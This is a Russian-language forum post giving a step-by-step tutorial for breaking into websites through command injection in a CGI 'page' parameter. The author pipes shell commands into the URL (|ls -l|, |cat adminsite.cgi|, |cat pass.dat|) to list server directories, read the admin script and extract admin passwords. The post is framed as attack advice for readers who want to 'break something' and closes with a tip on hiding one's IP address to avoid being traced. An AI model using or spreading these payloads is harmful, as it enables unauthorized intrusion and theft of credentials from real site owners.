sverige.sega.ex
Сообщений: 28
Оценки: 0
Присоединился: 2009-02-10 13:52:40.290000
|
Хочется что поломать? Попробуй метод атаки на cgi. Сейчас попытаюсь показать пример использования cgi баги. Если ты оказался на сайте и видишь в бродилке своего браузера такую форму: http://www.mysite.ru/cgi-bin/load.cgi?page=news то можно опробовать на содержание баги. Для этого измени адрес вызываемой страницы с news на |ls -l| Получается так: http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l| Если есть бага, и всё правильно то примерно ответ будет такой: total 240 -rwxr-xr-x 1 tqlib tqlib 1473 Aug 20 2001 Docs.cgi -rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 Hints.dat -rwxr-xr-x 1 tqlib tqlib 15765 Jun 28 2006 Load.cgi -rwxr-xr-x 1 tqlib tqlib 15714 Sep 3 2002 Load.cgi.old -rwxr-xr-x 1 tqlib tqlib 1255 Aug 18 2001 Logos.cgi -rwxr-xr-x 1 tqlib tqlib 227 Sep 4 2001 SearchPages.dat -rwxr-xr-x 1 tqlib tqlib 10 Apr 28 2005 data2.dat -rwxr-xr-x 1 tqlib tqlib 166537 Jan 14 2003 data3.dat -rwxr-xr-x 1 tqlib tqlib 164 Oct 1 2002 data4.dat -rwxr-xr-x 1 tqlib tqlib 2 Sep 3 2001 hintnumber.dat drwxr-xr-x 24 tqlib tqlib 4096 Sep 8 2002 adminboard -rw-r–r– 1 tqlib tqlib 0 Apr 28 2005 open.php drwxr-xr-x 2 tqlib tqlib 4096 Feb 23 2001 tqscripts Это набросок. Открываем исходный код страницы и видим уже вот так: total 240 -rwxr-xr-x 1 tqlib tqlib 1473 Aug 20 2001 Docs.cgi -rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 Hints.dat -rwxr-xr-x 1 tqlib tqlib 15765 Jun 28 2006 Load.cgi -rwxr-xr-x 1 tqlib tqlib 15714 Sep 3 2002 Load.cgi.old -rwxr-xr-x 1 tqlib tqlib 1255 Aug 18 2001 Logos.cgi -rwxr-xr-x 1 tqlib tqlib 227 Sep 4 2001 SearchPages.dat -rwxr-xr-x 1 tqlib tqlib 10 Apr 28 2005 data2.dat -rwxr-xr-x 1 tqlib tqlib 166537 Jan 14 2003 data3.dat -rwxr-xr-x 1 tqlib tqlib 164 Oct 1 2002 data4.dat -rwxr-xr-x 1 tqlib tqlib 2 Sep 3 2001 hintnumber.dat drwxr-xr-x 24 tqlib tqlib 4096 Sep 8 2002 adminboard -rw-r–r– 1 tqlib tqlib 0 Apr 28 2005 open.php drwxr-xr-x 2 tqlib tqlib 4096 Feb 23 2001 tqscripts если присмотреться видно строку drwxr-xr-x 24 tqlib tqlib 4096 Sep 8 2002 adminboard Теперь делаем так: Мы находимся по ссылке http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l| теперь лезим в "админский стол" (везде бывает по разному). Вписываем адрес "столика" получится так: http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l./../adminboard| Вот мы уже тама. Теперь видишь списочек. К примеру: -rwxr-xr-x 1 tqlib tqlib 1473 Aug 20 2001 htdocs -rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 admin -rwxr-xr-x 1 tqlib tqlib 14043 Sep 3 2001 counter.dat -rwxr-xr-x 1 tqlib tqlib 15765 Jun 28 2006 Load -rwxr-xr-x 1 tqlib tqlib 15714 Sep 3 2002 style.cgi -rwxr-xr-x 1 tqlib tqlib 227 Sep 4 2001 Useribfo.dat -rwxr-xr-x 1 tqlib tqlib 10 Apr 28 2005 data2.dat -rwxr-xr-x 1 tqlib tqlib 166537 Jan 14 2003 data3.dat Вот пример того что там может быть. Из них заходим в htdocs (htdocs эта директория сайта где лежат страницы того же сайта) Получится так: http://www.mysite.ru/cgi-bin/load.cgi?page=|ls -l./../adminboard/htdocs| Зашли и теперь пытаемся найти страницу с админкой. Она бывает обычно anload.cgi или admin.cgi Нашли? (Для того что бы проверить проверить откройте ту пагу в вкладке. Пага должна просить пароли и логин) Теперь мы нашли пагу с именем adminsite.cgi Открываем новое окно и пишем туда: www.mysite.ru/cgi-bin/load?page= и добовляем вот это |cat adminsite.cgi| Получится так: www.mysite.ru/cgi-bin/load?page=|cat adminsite.cgi| Видим туже админ пагу только уже со знаками и всеми причудами cgi. Открываем исходник паги и высматриваем слудещее: pass= login= присмотритесь, увидите что пасы и логины проверяются в какой то форме. Обычно бывает это форма pass.dat или login.dat Теперь проверим начинку етого самого pass.dat Пшием в бродилку вот так: www.mysite.ru/cgi-bin/load?page=|cat pass.dat| Теперь смотрим исходник полученной нами паги. И немного полистав, увидим пароль и логин к админке. Вот пожалуй и всё! ВНИМАНИЕ!!! Не все админы бывают тупые…При проделке этого фокуса, вас смогут легко вычеслить по вашему IP адресу. Прежде чем делать это всё подумай (или просто установи себе проггу для скрытия реального IP :)) Всем удачи в начинаниях!
|